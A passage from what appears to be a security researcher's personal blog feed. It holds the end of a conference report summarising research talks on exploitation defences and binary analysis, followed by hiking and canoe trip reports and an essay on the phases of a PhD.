forms of code-reuse attacks like Return Oriented Programming (ROP) are
still possible. Address Space Layout Randomization (ASLR) and stack
canaries are probabilistic protections against data-overwrite attacks
that rely on a secret that is shared with all code in the process. Any
information leak can be used to reveal that secret and to break the
probabilistic protection. String Oriented Programming is an approach
that exploits format string bugs to write to static regions of
regularly compiled executables and redirect control flow to carefully
prepared invocation frames on the stack, without triggering a stack
canary mismatch and while circumventing ASLR and DEP as well.&lt;/p&gt;
&lt;p&gt;In the third talk &lt;strong&gt;Viviane Zwanger&lt;/strong&gt; talked about &lt;a class="reference external" href="http://dl.acm.org/citation.cfm?id=2430556"&gt;Kernel Mode API
Spectroscopy for Incident Response and Digital Forensics&lt;/a&gt;. In the
talk Viviane presented her ideas on &amp;quot;API spectroscopy&amp;quot;: she measures the API
function calls of kernel drivers, classifies these function calls into
different groups, counts the number of calls per group, and uses a
feature vector based on the number of function calls to classify
potentially malicious drivers. The analysis is based on a static
approach where she uses kernel debugging functionality to get a dump of
the kernel memory image and extract individual drivers. The static
analysis then counts each function call and generates the feature
vector.&lt;/p&gt;
&lt;p&gt;In the last talk &lt;strong&gt;Martial Bourquin&lt;/strong&gt; presented &lt;a class="reference external" href="http://dl.acm.org/citation.cfm?id=2430557"&gt;BinSlayer: Accurate
Comparison of Binary Executables&lt;/a&gt;. He told us that there is no good
way to compare two different binaries. The only tool that is readily
available is Halvar Flake's &lt;a class="reference external" href="http://www.zynamics.com/bindiff.html"&gt;BinDiff&lt;/a&gt; tool, which relies mostly on a
bunch of heuristics. Martial extends BinDiff with a better similarity
metric by analyzing the call graph and collapsing similar entries.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="final-remarks"&gt;
&lt;h2&gt;Final remarks&lt;/h2&gt;
&lt;p&gt;All in all I must say that I enjoyed my stay in Rome. Both conferences
were interesting: meeting people during POPL and peeking into the
theorem-proving and formal-verification world was certainly challenging
and broadened my view. PPREW on the other hand felt like home: I was
aware of the related work, knew my area, and was surrounded by
friendly, like-minded people.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="Rome"></category><category term="analysis"></category><category term="travel"></category><category term="POPL"></category><category term="acm"></category><category term="sightseeing"></category><category term="PPREW"></category><category term="hacking"></category></entry><entry><title>Golden Gate bridge, Point Bonita lighthouse and light hike around the Rodeo lagoon</title><link href="/blog/2013/0210-golden-gate-bridge-point-bonita-lighthouse-and-light-hike-around-the-rodeo-lagoon.html" rel="alternate"></link><published>2013-02-10T17:19:00-05:00</published><updated>2013-02-10T17:19:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-02-10:/blog/2013/0210-golden-gate-bridge-point-bonita-lighthouse-and-light-hike-around-the-rodeo-lagoon.html</id><summary type="html">&lt;p&gt;On our first hike of the new year we set off for the Golden Gate bridge,
&lt;a class="reference external" href="http://www.nps.gov/goga/pobo.htm"&gt;Point Bonita lighthouse&lt;/a&gt; and beyond. We got up relatively late as we
only planned a very light hike as the first hike of 2013. The weather
was actually perfect and we set off with …&lt;/p&gt;</summary><content type="html">&lt;p&gt;On our first hike of the new year we set off for the Golden Gate bridge,
&lt;a class="reference external" href="http://www.nps.gov/goga/pobo.htm"&gt;Point Bonita lighthouse&lt;/a&gt; and beyond. We got up relatively late as we
only planned a very light hike as the first hike of 2013. The weather
was actually perfect and we set off with blue sky and a nice 15 degrees
Celsius (59 degrees Fahrenheit). The drive to the Golden Gate
recreational area was quite unspectacular: we drove over the Richmond -
San Rafael bridge and continued on Highway 101 until we reached the
park.&lt;/p&gt;
&lt;p&gt;Our first stop was at Hendrik Point where we enjoyed the best view of
the Golden Gate bridge ever. This is the most touristy spot in the area
but also closest to the bridge. We were very lucky as there was no fog
and we had an unobstructed view of the bridge and San Francisco.
The next stop was at Hawk Hill, which is less touristy. The view
is great and you can pass through a tunnel to the 'other side' and enjoy
the view of the seaside and the lighthouse. Shortly thereafter we had
lunch at the Bicentennial Campground and enjoyed the great views of the
bridge while we ate our sandwiches.&lt;/p&gt;
&lt;p&gt;The third stop was near the Point Bonita lighthouse. The parking lot
close to the lighthouse is usually full but there is an overflow lot
0.2 miles from the trailhead. The trail is a short walk of roughly 0.8
km (0.5 mi) and leads through an old tunnel to the amazing Point Bonita
lighthouse. Enjoy the stunning view and be amazed by the waves breaking
at the bottom of the rocks.&lt;/p&gt;
&lt;p&gt;To top it off we then walked to Rodeo Cove / Rodeo Lagoon beach and
started our extended hike around the Rodeo lagoon. When we reached the
beach we continued on the Coastal trail, passed Battery Townsley,
continued to Hill 88, backtracked on the Miwok trail, and passed the
historic Nike missile site on our way back to the car. All in all it was
an easy 10 km (6.3 mi) hike that marked the start of this year's hiking season.&lt;/p&gt;
&lt;p&gt;View &lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http://nebelwelt.net/gpslogs/20130210-Golden_Gate_Hike.kml"&gt;hike&lt;/a&gt; on a map&lt;/p&gt;
&lt;div class="section" id="picture-time"&gt;
&lt;h2&gt;Picture time&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0210/IMG_20130210_115150.jpg"&gt;&lt;img alt="image0" src="/blog/static/2013/0210/IMG_20130210_115150.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;View of the Golden Gate bridge right from Hendrik Point.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0210/IMG_20130210_115122.jpg"&gt;&lt;img alt="image1" src="/blog/static/2013/0210/IMG_20130210_115122.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Great view of the whole bridge with some sunlight glare from the side.
It was a wonderful day!&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0210/IMG_20130210_122159.jpg"&gt;&lt;img alt="image2" src="/blog/static/2013/0210/IMG_20130210_122159.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;View towards Point Bonita lighthouse from Hawk Hill.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0210/IMG_20130210_135304.jpg"&gt;&lt;img alt="image3" src="/blog/static/2013/0210/IMG_20130210_135304.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;View towards the bridge from the campground where we ate lunch.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0210/IMG_20130210_145551.jpg"&gt;&lt;img alt="image4" src="/blog/static/2013/0210/IMG_20130210_145551.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My lovely wife with the Rodeo Beach in the background.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0210/IMG_20130210_141303.jpg"&gt;&lt;img alt="image5" src="/blog/static/2013/0210/IMG_20130210_141303.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Awesome view from Point Bonita lighthouse. The sound and view of the
rolling surf hitting the rocks are amazing.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0210/IMG_20130210_141511.jpg"&gt;&lt;img alt="image6" src="/blog/static/2013/0210/IMG_20130210_141511.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Breath-taking view from Point Bonita towards the Golden Gate bridge.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;All in all it was a great hike and we enjoyed most of it. Sometimes it
was a bit too cold or a bit too hot (depending on whether we were just
walking in the sun or the wind was blowing from the sea) but if you
dress accordingly you will enjoy yourself. Just cross your fingers for
the perfect weather (thanks to Robert for being our lucky charm and
bringing the good weather from New York).&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="easy hike"></category><category term="day hike"></category><category term="beach"></category><category term="view"></category></entry><entry><title>Russian River Canoedeling</title><link href="/blog/2012/1006-russian-river-canoedeling.html" rel="alternate"></link><published>2012-10-06T22:11:00-04:00</published><updated>2012-10-06T22:11:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-10-06:/blog/2012/1006-russian-river-canoedeling.html</id><summary type="html">&lt;p&gt;For a change this post is not about a hike but about a canoe trip that
we did on the &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Russian_River_(California)"&gt;Russian river&lt;/a&gt;. We got up early in the morning to arrive
at &lt;a class="reference external" href="http://www.burkescanoetrips.com/"&gt;Burke's Canoe Trips&lt;/a&gt; around 11am. After a short safety message and
shelling out over $60 per canoe (one canoe …&lt;/p&gt;</summary><content type="html">&lt;p&gt;For a change this post is not about a hike but about a canoe trip that
we did on the &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Russian_River_(California)"&gt;Russian river&lt;/a&gt;. We got up early in the morning to arrive
at &lt;a class="reference external" href="http://www.burkescanoetrips.com/"&gt;Burke's Canoe Trips&lt;/a&gt; around 11am. After a short safety message and
shelling out over $60 per canoe (one canoe fits two to three persons) we could
head off to grab our canoes. What follows is a mellow journey downriver
that lasts about 5-6 hours and features paddling, swimming, some
adrenaline rushes, and lots of beautiful scenery.&lt;/p&gt;
&lt;div class="section" id="trail-navigation"&gt;
&lt;h2&gt;Trail navigation&lt;/h2&gt;
&lt;p&gt;Burke's Canoe Trips is easy to find and is the start and end of this
trip. Burke provides a shuttle service from the final landing spot back
to the start of the trip. The Russian river is a slow-flowing, easy river
without many surprises. In fact you have to paddle quite a lot when the
river gets wide and the stream velocity slows down to almost zero.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20121006-Burkes_Canoe_Trip.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="trip-description"&gt;
&lt;h2&gt;Trip description&lt;/h2&gt;
&lt;p&gt;This is a very easy trip that almost anyone can do. Burke's Canoe Trips
checks that you can swim and you must wear a swim vest at all times. It
is important that you bring a cooler (or backpack) with enough food and
drink for the day (consumption of alcohol is not allowed). A pro tip:
use trash bags to seal your backpack and leave all valuables (and
electronic gadgets) in your car as the canoe might tip and give you a
nice refreshment! Although we were careful canoers, we tipped once when
we got stuck on top of a tree stump that reached halfway out of the water
(and some girls in a canoe crashed into us while we were struggling to
get free of said stump). In addition, the stream velocity can be high in
some spots.
Overall we were paddling for around 3-4 hours with roughly two hours of
drying off or just relaxing on the beaches alongside the river.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2012/1006/2012-10-06-burkes_canoe_trip.png" /&gt;&lt;/p&gt;
&lt;p&gt;The way back was a lot quicker than the journey downstream.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="picture-time"&gt;
&lt;h2&gt;Picture time&lt;/h2&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2012/1006/DSCF4520.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Starting our journey.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2012/1006/DSCF4523.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Some detour through the bushes.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2012/1006/DSCF4526.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Wildlife alongside the river.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image4" src="/blog/static/2012/1006/DSCF4527.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;The ducks were inspecting our canoes.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;It was a very fun day trip that I would do again. We underestimated
the thrill factor and the current once, when we tipped, but it was never
dangerous as we were wearing our vests. Just watch out for your
valuables and gadgets - they might not like to get wet!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="day hike"></category><category term="swimming"></category><category term="canoe"></category></entry><entry><title>Muir Woods hike</title><link href="/blog/2012/1005-muir-woods-hike.html" rel="alternate"></link><published>2012-10-05T21:44:00-04:00</published><updated>2012-10-05T21:44:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-10-05:/blog/2012/1005-muir-woods-hike.html</id><summary type="html">&lt;p&gt;&lt;a class="reference external" href="http://www.nps.gov/muwo/index.htm"&gt;Muir Woods National Monument&lt;/a&gt; is a very special park as you see many
&lt;a class="reference external" href="http://en.wikipedia.org/wiki/Sequoioideae"&gt;redwood&lt;/a&gt; groves with huge trees. The park features two short loops
down in the valley that pass along a couple of different redwood groves.
These loops are like highways, almost paved, and well looked-after.&lt;/p&gt;
&lt;div class="section" id="trail-navigation"&gt;
&lt;h2&gt;Trail navigation&lt;/h2&gt;
&lt;p&gt;We …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;p&gt;&lt;a class="reference external" href="http://www.nps.gov/muwo/index.htm"&gt;Muir Woods National Monument&lt;/a&gt; is a very special park as you see many
&lt;a class="reference external" href="http://en.wikipedia.org/wiki/Sequoioideae"&gt;redwood&lt;/a&gt; groves with huge trees. The park features two short loops
down in the valley that pass along a couple of different redwood groves.
These loops are like highways, almost paved, and well looked-after.&lt;/p&gt;
&lt;div class="section" id="trail-navigation"&gt;
&lt;h2&gt;Trail navigation&lt;/h2&gt;
&lt;p&gt;We parked in the lower parking area near the visitor center. There is
only limited parking and especially on weekends you might have to fall
back on the Muir Woods shuttle service that transports you from overflow
parking to the trailheads.
We started on one of the bigger loops and headed off on another trail
when we got bored of the 'highway'-like, overly accessible trails. After
following some steep inclines we made it up to the scenic highway and
slowly circled back to the main trail.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20121005-Muir_Woods_National_Monument.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hike-description"&gt;
&lt;h2&gt;Hike description&lt;/h2&gt;
&lt;p&gt;The hike was an easy 5 mi (8.2 km) stroll and we passed hundreds of huge
redwood trees. The incline was not too steep and offered additional
views of younger redwood groves along the valley.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2012/1005/2012-10-05-muir_woods_profile.png" /&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="picture-time"&gt;
&lt;h2&gt;Picture time&lt;/h2&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2012/1005/DSCF4502.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;My parents at the trailhead to Muir Woods&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2012/1005/DSCF4504.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;One of the large redwood trees.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2012/1005/DSCF4509.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;On the incline up to the top.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image4" src="/blog/static/2012/1005/DSCF4510.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;A huge number of smaller (younger) trees.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;The hike is very easy going and can be done in roughly two hours. It is
easy to walk and large parts of the hike are on paved roads. Remember to
bring 1 liter of water per person.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="redwood"></category><category term="easy hike"></category><category term="view"></category></entry><entry><title>Lake Anza stroll</title><link href="/blog/2012/0930-lake-anza-stroll.html" rel="alternate"></link><published>2012-09-30T19:13:00-04:00</published><updated>2012-09-30T19:13:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-09-30:/blog/2012/0930-lake-anza-stroll.html</id><summary type="html">&lt;p&gt;Today was a sunny late September lazy Sunday and we just wanted to get
out to enjoy the sun and relax a little. We packed our bag with
swimsuits, enough water, some carrots, sweets, and sun lotion and set
off for Lake Anza in &lt;a class="reference external" href="http://www.ebparks.org/parks/tilden"&gt;Tilden Regional Park&lt;/a&gt;. As a side …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Today was a sunny late September lazy Sunday and we just wanted to get
out to enjoy the sun and relax a little. We packed our bag with
swimsuits, enough water, some carrots, sweets, and sun lotion and set
off for Lake Anza in &lt;a class="reference external" href="http://www.ebparks.org/parks/tilden"&gt;Tilden Regional Park&lt;/a&gt;. As a side quest we added
some GeoCaches onto our GPS.&lt;/p&gt;
&lt;div class="section" id="trail-navigation"&gt;
&lt;h2&gt;Trail navigation&lt;/h2&gt;
&lt;p&gt;Trail navigation was not easy in Tilden Regional Park. According to the
map that we saved from an &lt;a class="reference external" href="20120915-wildcat-canyon-hike.html"&gt;earlier visit&lt;/a&gt; the only parking close to any
trailhead was either right at the lake or at the botanical garden. So we
drove down to the botanical garden and took a short stroll through the
magical garden. If you have more time: go to the visitor center and get
informed about all the details of the plants around you. We then headed
off to the Selby trail - luckily we had our GPS with us as there were no
signs nearby. When we finally found the trailhead (next to an unmarked
parking lot) we started a nice stroll around the lake, switching from the
Selby to the Gorge trail and back to the botanical garden.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20120930-Tilden_Park-Lake_Anza.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="stroll-description"&gt;
&lt;h2&gt;Stroll description&lt;/h2&gt;
&lt;p&gt;The short stroll is only 3 miles (4.75 km) and very easy going. You can
branch off to discover some GeoCaches on the sides of the trail and most
of the area is covered by trees. On the south-west side of the lake
there is an artificial beach (with lifeguards on duty). We stayed there
for 2 to 3 hours and enjoyed the last bit of sun. You can bathe there as
well and there are showers and changing rooms nearby.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2012/0930/lake_anza_stroll_height_profile.png" /&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;The stroll was undemanding and easy going. Sometimes you have to climb
over some stones but nothing drastic. We enjoyed the warm
beginning-of-autumn day and went for a nice (and chilly) swim in Lake
Anza. This stroll would be a great tour for kids as well!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="easy hike"></category><category term="GeoCache"></category><category term="swimming"></category><category term="beach"></category></entry><entry><title>PhD: expectations and reality</title><link href="/blog/2012/0921-phd-expectations-and-reality.html" rel="alternate"></link><published>2012-09-21T05:37:00-04:00</published><updated>2012-09-21T05:37:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-09-21:/blog/2012/0921-phd-expectations-and-reality.html</id><summary type="html">&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Deciding to do a PhD is a huge commitment as you are just dedicating a
couple of years of your life to a single cause.&amp;nbsp;When I decided to do a
PhD in 2006 I was not completely sure what to expect. I just
finished my master of …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Deciding to do a PhD is a huge commitment as you are dedicating a
couple of years of your life to a single cause.&amp;nbsp;When I decided to do a
PhD in 2006 I was not completely sure what to expect. I had just
finished my Master of Science (MSc) at ETH Zurich and I knew that I
really liked working on the research project that I chose. On the other
hand I had worked in programming and web development for the previous
couple of years to finance my studies and I had discovered that only
doing project/programming work was too boring for me. I had no clear
picture of what the PhD would be like, but I assumed that it would be a
combination of a continuation of the research from my master thesis,
writing papers, going to conferences to present my research, and in the
end writing a thesis that proves my thesis statement.&lt;/p&gt;
&lt;p&gt;Many others before me have already blogged or written books about
life as a PhD student, how to carry out a PhD, and what defines
research, yet I think that I can add my two cents to the existing
stories. My experiences are still fresh (I started my PhD in 2006,
defended at the beginning of May 2012, and started my PostDoc here at UC
Berkeley in September 2012) and I hope that I can give a good
description of the qualitative aspects of a PhD.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-three-phases-of-a-research-phd"&gt;
&lt;h2&gt;The three phases of a research PhD&lt;/h2&gt;
&lt;p&gt;In my time as a PhD student at ETH Zurich I had countless discussions
with peers, assistant professors, professors, researchers, and people
related to academia. During these discussions we discovered that a PhD
can be segmented into three basic phases: the first phase identifies the
research topic and bootstraps the student; the second phase is the
productive phase where the research bears fruit and is turned into
papers (or at least communicated to other people); and the last phase
consists of wrapping up, writing the thesis, and finally the defense.
Every successful PhD student goes through these three phases during his
PhD. Each phase has different requirements and relies on different
personality aspects. The phases follow one after the other; there is no
clear transition from one phase to the next, yet one knows once the
transition has completed.&lt;/p&gt;
&lt;div class="section" id="the-search-for-the-holy-grail-ramping-up-and-finding-your-topic"&gt;
&lt;h3&gt;The search for the holy grail: ramping up and finding your topic&lt;/h3&gt;
&lt;p&gt;The first phase of a PhD is like the 'get to know each other' phase at
the beginning of a relationship. You don't really know what to expect
but you are interested and you want to explore. Yes, there are some
peculiarities but you are not too concerned about that right now. In
this first phase you dig into the field that is interesting to you and
you start reading up about prior research approaches about the problem
you want to tackle. Some ideas start to form in your head and you decide
on a topic for your thesis. In more practical research areas you start
building prototypes and you execute small tests; in more theoretical
areas you try to come up with some theorems and you have a rough idea
about the general topic.&lt;/p&gt;
&lt;p&gt;Depending on your adviser he or she will restrict your search in one way
or another. The most restrictive adviser tells you exactly what you
should do (sometimes they have a grant proposal for a specific project
and/or only need a code monkey to implement their grand idea) other
advisers let you run free and let you come up with your own idea in a
(sub-)field. Both extremes have their advantages and the kind of adviser
that is best for you is basically an optimization problem that you need
to solve for yourself.&lt;/p&gt;
&lt;p&gt;On one end of the scale you are given a topic by your adviser. This
approach ensures that your adviser cares (or should care) deeply about
your project and it gives you a head start; on the other hand you'll
have to make up for this pre-selection and you'll have a harder time
bringing your own (research) ideas into the already existing project. On the
other end you can choose your topic in an open void. It is up to you to
make your adviser care about the project and you need to come up with
the core idea. This great opportunity usually results in additional time
needed to complete this phase. In the real world your adviser will
usually set the limits anywhere between these two extremes.&lt;/p&gt;
&lt;p&gt;From my experience I would say that the average student stays in this
phase from one to three years. I was lucky enough to have an adviser
that allowed me to choose freely in any field that he was comfortable
with. During my first three years I discussed a huge set of possible
research ideas with him and even after we had settled on a specific
topic the details kept changing as I passed through the later phases.
Two key aspects in this phase are: (i) creativity: you need to come up
with a good research idea and research plan. Nobody will tell you what
to do; there is neither a customer who demands a specific feature, nor
a pre-set plan like the script of a play. You need to stay focused and keep
yourself together to pass through this phase. (ii) Pressure: because
you need an idea and you are responsible for the schedule, you build up a
huge amount of psychological pressure. Most people who drop out during
this phase fail due to either a lack of ideas (and creativity) or
because they are unable to organize themselves in an unstructured
work environment.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-paper-mill"&gt;
&lt;h3&gt;The paper mill&lt;/h3&gt;
&lt;p&gt;After you have decided on the (main) topic of your thesis and built the
first prototype (or came up with the first layout of the system) you
gradually transition from the first phase to the second phase. You are
now trapped in the paper mill. This is the most productive phase as you
try to publish your work in as many (good) conferences as possible. The
quality of your work is (somewhat) measured in the number of papers that
you publish at top-tier conferences. You are evaluated based on the
quality of your work combined with the human factor of how you present
yourself.&lt;/p&gt;
&lt;p&gt;In this phase you start to become an expert in your field: you have
claimed a little spot in a bigger field that you extend with your
research. Your adviser will try to keep you in this phase as long as you
are able to produce more good papers (given that your adviser has enough
funding and that you do not run into any hard time limits imposed by your
university).&lt;/p&gt;
&lt;p&gt;The core qualifications for this phase are that you can (i) work hard
and (ii) present yourself at conferences. You have to write all these
papers and at the same time you should refill your pipeline of ideas to
get the next publications in order. In addition you have to express all
these ideas to others and you have to play the social game at
conferences. Building your social network during conferences is actually
hard work and you need to try to make friends with some of the bigger
shots in your field as this can be helpful for future collaborations,
additional papers, or even reviews. If other people understand your
ideas from beginning to end and you can convince them (in person) that
the ideas are great then they are more likely to accept a paper of yours
that they'll review later on. This (productive) phase usually lasts
about two years and is your opportunity to build your social network for
possible future positions. A side quest during this time is to select
your thesis committee. You already know what area you will write your
thesis in, you should have an idea about your thesis statement, and you
should know who the experts are in this area. Hint: conferences are a
good place to chat up possible committee members!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-exit-strategy-wrapping-up-and-writing-your-thesis"&gt;
&lt;h3&gt;The exit strategy:&amp;nbsp;wrapping up and writing your thesis&lt;/h3&gt;
&lt;p&gt;After you have churned out a bunch of papers during your time in the
paper mill you are finally ready to graduate. At one point in time you start
to feel ready, you have published a couple of papers (or at least
written a couple of technical reports if you weren't able to publish the
papers) and you developed a good understanding of what research in your
area is about. In your (regular or not so regular) meetings with your
adviser you should also get a feeling if he or she thinks that you are
ready.&lt;/p&gt;
&lt;p&gt;At ETH you write your thesis from scratch. I started with reading (or at
least skimming) my prior papers before I wrote my thesis. After that I
came up with the basic outline and the vision that my thesis should get
across. The goal of the thesis is to write down your thesis statement
and to prove said statement. It is important that your thesis is a
self-contained and self-consistent document.&lt;/p&gt;
&lt;p&gt;In this phase you should have settled on your thesis committee. Your
committee consists of a couple of professors (or people with a PhD
depending on your university) that are experts in your area of research.
These experts will read your thesis and grill you during your defense.
Some people quit at this late stage of the PhD due to timing constraints
or due to burnout. After a couple of years they are worn out and run
into deadlines imposed by their adviser or by the university. It makes
me sad when I see colleagues who make it to this point in their career
and then quit so close to the finish line.&lt;/p&gt;
&lt;p&gt;The defense is the end of this last phase and after you have passed this
final test you have almost completed your PhD. At most universities
there are some bureaucratic hurdles left for you to clear and
there might be some minor (or major) revisions to your written thesis
that you have to carry out. Other than that you are done and at some
delta t after the defense you are allowed to call yourself PhD (or Dr.
Sc in my case).&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="the-teaching-aspect-in-a-phd"&gt;
&lt;h2&gt;The teaching aspect in a PhD&lt;/h2&gt;
&lt;p&gt;Teaching is an orthogonal experience to the research experience. At ETH
you are supposed to be the teaching assistant (TA) for one lecture per
semester. At the beginning you will start off as a regular TA but as you
progress in your PhD you will be trusted with more and more
responsibilities, e.g. you will teach lectures if the professor is sick,
or you will be head TA for a complete lecture. Head TAs are responsible
for coordinating the lecture, supervising the other TAs, and organizing
the individual exercises.&lt;/p&gt;
&lt;p&gt;I really enjoyed teaching during my almost 5 1/2 years at ETH and I
think that it is a great experience that every PhD student should have. During
the exercise hours that you have to supervise you learn how to speak in
front of a group (a skill that is not that common in Switzerland and
that is not part of the regular curriculum at high school or college),
you learn how to prepare the material so that you can present it to a
group of students, and most importantly you learn how to interact with
all kinds of students that have different problems with the material,
the course, or a specific exercise. All in all you learn a new skill:
how to teach some specific material to students. If you plan an academic
career then this might come in handy at one point in time.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-phd-grind"&gt;
&lt;h2&gt;The PhD grind&lt;/h2&gt;
&lt;p&gt;Right when I was finishing my thesis Philip Guo published his memoirs
about his own PhD experience in an e-book called &amp;quot;&lt;a class="reference external" href="http://pgbovine.net/PhD-memoir.htm"&gt;The PhD Grind&lt;/a&gt;&amp;quot;.
In the book Philip tells us about his PhD experience year by year in
chronological order. Each year of his PhD is covered in a chapter and he
writes about all the ups and downs during that time. The book is a great
read and I warmly recommend that you read it too if you are interested
in research and academia.&lt;/p&gt;
&lt;p&gt;I agree with many of his observations, e.g., that it is important that
you focus on conferences that your adviser has already published at in
recent years. Your adviser will know the right lingo and the right
buzzwords for the conference and the members of the committee will know
your adviser which in turn will help as well.&lt;/p&gt;
&lt;p&gt;On the other hand there are a couple of things where I don't agree with
Philip. Most importantly Philip mentioned that &lt;strong&gt;being a TA only delays
the PhD&lt;/strong&gt; (page 70 of the e-book). As I explained above I really valued
the teaching experience - from a personal as well as from a professional
point of view. During the discussions with the students I learned
several new and interesting details in areas that I had assumed to
know in depth. Another area where I don't agree with Philip is how to
select your thesis committee.&amp;nbsp;Philip tells us that &lt;strong&gt;usually the adviser
selects the thesis committee&lt;/strong&gt;&amp;nbsp;(page 56 of the e-book); I on the other
hand had the pleasure of selecting my own committee. I discussed possible
members of the committee with my adviser and then approached each member
myself. For me this was an interesting experience - first coming up with
possible and plausible fits and then approaching these professors
myself.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;A PhD is certainly not the right career path for everyone. Doing a PhD
is challenging and requires a lot of self-control and self-organization.
The PhD is not (pre-)structured and you will need a lot of creativity.
In addition you get less pay than in an industry position with a
comparable education. On the other hand you learn a huge number of new
skills during your PhD. This is your opportunity to do academic
research: you can publish at conferences, you'll meet a huge number of
new people, and you learn to network. I enjoyed my time and I recommend
doing a PhD to all the curious people out there who are interested in
academia and who want to go that extra mile.&lt;/p&gt;
&lt;/div&gt;
